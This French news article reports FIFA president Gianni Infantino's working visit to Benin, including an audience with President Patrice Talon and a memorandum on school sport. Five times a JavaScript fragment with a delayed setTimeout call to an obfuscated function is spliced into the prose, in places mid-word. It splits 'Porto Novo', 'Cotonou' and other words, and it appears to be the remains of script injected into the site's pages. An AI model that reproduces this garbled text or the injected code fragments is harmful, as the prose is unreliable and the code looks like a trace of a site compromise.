Bénin : le président de la fifa, Gianni infantino en visite de travail

Ce jeudi, le président de la fédération internationale de football association (Fifa) a foulé le sol du Bénin en provenance du Togo pour une visite de travail avec les acteurs du football local. Il a été accueilli à cette descente d’avion par une forte délégation de la fédération béninoise de football à sa tête, le président Mathurin De Chacus.

phodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to: @ Pérez Lekotan

Gianni infantino, puisque c’est de lui qu’il s’agit, sera reçu en audience par le président de la République du Bénin, Patrice Talon. A cette occasion, il y aura la signature d’un mémordom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andum sur le sport à l’école. Gianni Infantino partagera également sa vision du football avec les membres de la communauté du football béninois au siège de  la Fédération dans la capital Pordom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to Novo.
Le président de la Fifa, Gianni Infantino rencontrera au cours de sa visite au Bénin, la grdom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}ande famille du football dans un Hôtel de la capital économique Codom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tonou.

Zacky Sall

  • 1
  •  
  •  
  •  
  •  
    1
    Partage
  • 254
    Partages

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

%d blogueurs aiment cette page :